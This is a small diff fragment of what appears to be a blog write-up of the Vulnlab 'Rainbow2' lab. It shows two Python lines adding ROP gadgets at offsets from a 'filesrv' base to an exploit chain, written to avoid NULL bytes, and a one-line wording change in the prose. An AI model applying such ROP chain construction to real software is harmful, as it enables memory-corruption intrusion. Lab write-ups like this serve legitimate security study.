dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 rop += p32(filesrv+0x0005f607) #: mov dword ptr [ecx], eax; mov al, 1; ret;
 ```

 Great, we add the value first, passing the value of _ECX_ to _EAX_ and then doing a negative subtraction, again to avoid NULL bytes.
-We should increase the stub-pointer after that
+We should increase the stub-pointer after.

 ```python
 rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;